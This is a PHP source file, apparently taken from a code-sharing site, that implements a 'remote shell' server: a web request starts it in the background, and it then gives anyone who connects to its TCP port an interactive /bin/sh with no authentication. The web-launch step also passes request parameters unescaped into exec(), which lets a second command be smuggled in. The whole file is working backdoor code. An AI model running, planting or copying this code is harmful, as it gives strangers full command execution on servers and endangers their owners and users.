Location: PHPKode > scripts > pserver > pshell.php
<?

if ( !( $_SERVER["USER"] OR $_SERVER["PWD"] OR $_SERVER["TERM"] OR count($_SERVER["argv"]) > 1 ) )
{
	// Corre por Web
	exec("php ".basename( $_SERVER["PHP_SELF"] )." ".$_REQUEST["ip"]." ".$_REQUEST["p"]."  & ");
	die(" RUN FORKED ");
}


/**
 * Remote Shell in PHP
 *
 * Thiss Class in a example of a Server create using class pserver
 *
 * @package pserver
 * @subpackage pserver.example
 * @author Pedro Vargas (hide@address.com) http://deerme.org
 * @version 0.1
 * @licence GNU General Public License (GPL)
 */

require('pserver.class.php'); 

 
class pshell extends pserver
{
	
	var $pipes = array(
			0 => array("pipe", "r"),
			1 => array("pipe", "w"),
			2 => array("pipe", "w")
			);

	var $shell = "/bin/sh -i";
	var $chunk_size = 4096;
	var $socketbinary = true;
	/**
	* Read data on the client
	*/
	
	function readData( $data , &$client  )
	{		
		// Have a shell ?
		if ( !isset( $client["shell"] ) )
		{			
			$client["shell"] = proc_open($this->shell, $this->pipes,$client["pipes"]);
			if (!is_resource($client["shell"]))
			{
				$this->logger("Shell","Can't open shell ".$this->shell."  ");
			}
			// Set everything to non-blocking
			stream_set_blocking($client["pipes"][0],0);
			stream_set_blocking($client["pipes"][1],0);
			stream_set_blocking($client["pipes"][2],0);			
		}
		// Data Client -> Process
		fwrite($client["pipes"][0], $data);
		usleep(10000);			
		
	}
	
	/**
	* Write data on the client
	*/
	function writeData( $data , &$client)
	{
		// If we can read from the process's STDOUT
		// send data down tcp connection		
		
		if ( !isset( $client['pid'] ) AND  function_exists("pcntl_fork") )
		{
			$client['pid'] = pcntl_fork();
			if($pid == -1)
			{
				$this->logger("Process","Could not fork Process");
				die();
			}
			else if ($client['pid'])
			{	
				// Father
				$this->pids[] = $client['pid'];
			}
			else
			{
				// Son
				while( 1 == 1)
				{
					$input = fread($client["pipes"][1], $this->chunk_size);
					$input = str_replace("\n","\n\r",$input);
					if ( @socket_write($client['socket'], $input  ) === false )
					{					
						// Dead socket
						$this->logger("Socket","Dead Socket");
						socket_close($client['socket']);
						unset($client);
						// Die Process
						die();
					}
					
					$input = fread($client["pipes"][2], $this->chunk_size);
					$input = str_replace("\n","\n\r",$input);
					if ( $input != "" )
					{
						if ( eregi("sh" , $input ) and strlen($input) == 16 )
							$input = substr( $input , 0 , 8 );
						if ( @socket_write($client['socket'], $input  ) === false )
						{
						}
					}
					usleep(10000);
				}
			}
		}
		else
		{
			// I cant Fork
			$input = fread($client["pipes"][1], $this->chunk_size);
			$input = str_replace("\n","\n\r",$input);			
			if ( $input != "" )
			{
				if ( eregi("sh" , $input ) and strlen($input) == 16 )
					$input = substr( $input , 0 , 8 );
				if ( socket_write($client['socket'], $input  ) === false )
				{
					$this->logger("Socket","Dead Socket");
					socket_close($client['socket']);
					unset($client);
				}
			}
			$input = fread($client["pipes"][2], $this->chunk_size);
			$input = str_replace("\n","\n\r",$input);			
			if ( $input != "" )
			{
				if ( eregi("sh" , $input ) and strlen($input) == 16 )
					$input = substr( $input , 0 , 8 );
				if ( socket_write($client['socket'], $input  ) === false )
				{
					
				}
			}
		}		
		
	}
	
	
	
}

$ip = ($argv[1] ? $argv[1] : 0 );
$p = ($argv[2] ? $argv[2] : 30022 );

// Instance Server
$server = new pshell($ip,$p);
$server->msg_welcome = unserialize(base64_decode("czozMzg6IhtbMTszMjs0MG1XZWxjb21lIHRvIFBIUCBQU2VydmVyG1sxOzM1OzQwbQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgIC98Xw0KICAgICAgICAgICAgICAgICAgICAgICAgLCcgIC5cDQogICAgICAgICAgICAgICAgICAgICwtLScgICAgXywnDQogICAgICAgICAgICAgICAgICAgLyAgICAgICAvDQogICAgICAgICAgICAgICAgICAoICAgLS4gIHwNCiAgICAgICAgICAgICAgICAgIHwgICAgICkgfA0KICAgICAgICAgICAgICAgICAoYC0uICAnLS0uKQ0KICAgICAgICAgICAgICAgICAgYC4gKS0tLS0nDQobWzE7MzI7NDBtCQkJIFBsZWFzZSwgdGFrZSBhIGNhdCAuLi4gG1sxOzM3OzQwbQoNIjs="));
$server->start();

?>
Return current item: pserver